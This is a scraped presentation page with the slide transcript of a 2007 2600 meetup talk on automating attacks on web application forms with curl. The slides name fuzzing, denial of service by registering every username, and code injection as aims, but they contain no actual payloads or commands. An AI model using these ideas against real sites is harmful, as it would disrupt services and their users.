1 / 9

Automating Exploits for Web Applications

Automating Exploits for Web Applications. Ft Smith 2600 August 2007. Web Apps. Examples Forums Google Maps just about anything ”Web 2.0”. Web Apps. most apps need information from you Example address for directions an email address registration info for a purchase. Tools. *nix

kenyon-lane
Télécharger la présentation

Automating Exploits for Web Applications

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Automating Exploits for Web Applications • Ft Smith 2600 • August 2007

  2. Web Apps • Examples • Forums • Google Maps • just about anything ”Web 2.0”

  3. Web Apps • most apps need information from you • Example • address for directions • an email address • registration info for a purchase

  4. Tools • *nix • Curl http://curl.haxx.se/ • Libcurl http://curl.haxx.se/libcurl/ • lynx -dump (whereever you get lynx)‏ • Windows • Curl • Really Bored • don't automate. do it by hand

  5. Web Apps • This is an example of an application that accepts input from a user

  6. Web Apps • What is normally sent using curlip.sh

  7. Web Apps • what could be sent using a malicious script

  8. Why bother? • Fuzzing • testing parameters with seemingly valid data until it breaks • Denial of Service • take up all available usernames on a website • Code injection • see what, if any, code is deemed valid

  9. Other sort of related materials • curlip.tgz • utility I wrote when learning about curl • posts your external ip address to http://shyft.us/ip.php • sort of a poor man's dyndns • whatsmyip.pl • utility for windows to retrieve your external ip written in perl • again by me • either of these could easily be used to pull down every forum post or post arbitrary data to a server

More Related